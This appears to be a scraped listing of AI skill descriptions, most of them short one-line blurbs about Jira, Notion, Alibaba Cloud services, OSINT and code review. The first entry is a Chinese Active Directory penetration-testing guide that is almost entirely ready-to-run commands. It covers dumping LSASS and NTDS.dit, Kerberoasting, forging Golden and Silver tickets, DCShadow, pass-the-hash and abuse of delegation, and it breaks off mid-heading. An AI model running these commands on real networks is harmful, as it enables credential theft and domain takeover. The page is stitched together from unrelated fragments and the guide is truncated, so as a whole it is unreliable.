全部能力

Active Directory 渗透测试技术指南 ## 信息收集 ### 域基础信息 - `nltest /domain_trusts` - 查看域信任关系 - `net view /domain` - 枚举域列表 - `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - 定位域控制器 ### BloodHound 资产发现 ```powershell # SharpHound 数据收集 Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip ``` ### LDAP 查询 ```powershell # 查找域管账户 ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll() # 查找非约束委派的服务账户 Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))" ``` ## 凭据获取 ### LSASS 内存提取 ```powershell # procdump + mimikatz 离线解析 procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` ### SAM/NTDS.dit 提取 ```powershell # Volume Shadow Copy 方式 vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\ # ntdsutil 官方工具 ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q ``` ### Kerberoasting ```powershell # 请求 SPN 服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433" # Rubeus 自动化 Rubeus.exe kerberoast /outfile:hashes.txt ``` ## Kerberos 攻击 ### AS-REP Roasting ```powershell # 查找 "Do not require Kerberos preauthentication" 账户 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth # Rubeus 攻击 Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt ``` ### Golden Ticket ```powershell # 需要 krbtgt 账户的 NTLM hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt ``` ### Silver Ticket ```powershell # 针对特定服务，需要服务账户 NTLM hash mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt ``` ### DCShadow ```powershell # 需要域管权限，注册伪造 DC mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor" ``` ## 横向移动 ### Pass-the-Hash ```powershell # mimikatz sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe # Invoke-WMIExec Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..." ``` ### Over-Pass-the-Hash ```powershell # 获取 TGT 后使用正常 Kerberos 认证 Rubeus.exe asktgt /user:admin /rc4:hash /ptt ``` ### Pass-the-Ticket ```powershell # 导出票据后注入 mimikatz # sekurlsa::tickets /export mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi ``` ### 约束委派滥用 ```powershell # 配置 S4U2Self + S4U2Proxy Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt ``` ### 基于资源的约束委派 (RBCD

Auto-fixes low-risk tech debt (unused imports, dead code, commented-out code) with >=90% confidence. Use when audit findings need safe automated cleanup.

Analyze Reddit threads for sentiment, consensus opinions, top arguments, and discussion patterns. Use this when users want to understand Reddit community…

Jira integration. Manage project management and ticketing data, records, and workflows. Use when the user wants to interact with Jira data.

Structured OSINT investigations — people lookup, company intel, investment due diligence, entity/threat intel, domain recon, organization research using public…

最小化验证爬取与技能工作流的就绪状态。

You are a security expert specializing in dependency vulnerability analysis, SBOM generation, and supply chain security. Scan project dependencies across…

Notion integration. Manage project management and document management data, records, and workflows. Use when the user wants to interact with Notion data.

Find bugs, security vulnerabilities, and code quality issues in local branch changes. Use when asked to review changes, find bugs, security review, or audit…

You are a compliance expert specializing in regulatory requirements for software systems including GDPR, HIPAA, SOC2, PCI-DSS, and other industry standards.…

通过 OpenAPI/SDK 管理阿里云内容安全（Green）。当用户需要内容安全资源和策略操作时随时使用，包括…

通过 OpenAPI 管理阿里云 RDS Supabase（RDS AI Service 2025-05-07）。用于创建、启动/停止/重启实例、重置密码等操作。

>

通过 OpenAPI/SDK 管理阿里云 Data Lake Formation (DlfNext)。当用户需要进行 DLF Next 目录/治理资源操作时使用，包括…

通过 OpenAPI/SDK 管理阿里云云防火墙（Cloudfw）。当用户请求防火墙策略/资源操作、变更管理、状态查询等时使用。

Single entry point for all AEM as a Cloud Service Dispatcher skills. Covers config authoring, technical advisory, incident response, performance tuning, security hardening, and full lifecycle orchestration for the Adobe Dispatcher Apache HTTP Server module and its HTTPD/dispatcher configuration.

>-

通过 OpenAPI/SDK 管理阿里云 ID Verification (Cloudauth)。当用户进行身份验证资源操作、配置…时使用。

通过 OpenAPI/SDK 管理阿里云安全中心（Sas）。当用户需要安全中心资源操作、配置更新、状态查询等时使用。

Build comprehensive attack trees to visualize threat paths. Use when mapping attack scenarios, identifying defense gaps, or communicating security risks to…